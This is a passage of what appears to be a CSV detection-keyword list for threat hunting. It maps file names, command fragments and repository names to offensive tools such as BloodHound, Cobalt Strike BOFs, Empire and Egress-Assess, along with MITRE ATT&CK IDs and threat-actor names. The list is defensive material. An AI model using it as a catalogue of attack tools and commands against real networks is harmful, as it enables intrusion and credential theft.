tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bloodhound --no-sandbox*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-*.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*bloodhound.ad.*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.bin*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*bloodhound.enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bloodhound.py *","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bloodhound_output*/dev/null*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bloodhound_output_dconly_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*BloodHoundAD*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*BloodHoundAD*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*BloodHoundGraphToGoFetchPath*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*bloodhound-import -du neo4j -dp *.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*BloodHound-master*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-modified.ps1*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*bloodhound-python*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound-quickwin -u * -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bloodhound-quickwin-main*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*bloodyAD -*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bloodyAD.py*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bloodyAD-main*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bluekeepscanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*bm90cmVkYW1lY2hlYXRzdG93aW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*bniikohfmajhdcffljgfeiklcbgffppl*","greyware_tool_keyword","Upnet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bnijmipndnicefcdbhgcjoognndbgkep*","greyware_tool_keyword","Veee","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bob@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*BOF prototype works!*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*bof*/CredEnum/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*BOF.NET.git*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BOF.NET-main*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BOF/*procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*bof_allocator*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bof_helper.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","198","44","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" +"*bof_net_user.c*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*bof_net_user.o*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*bof_pack.py *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BOF2shellcode*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 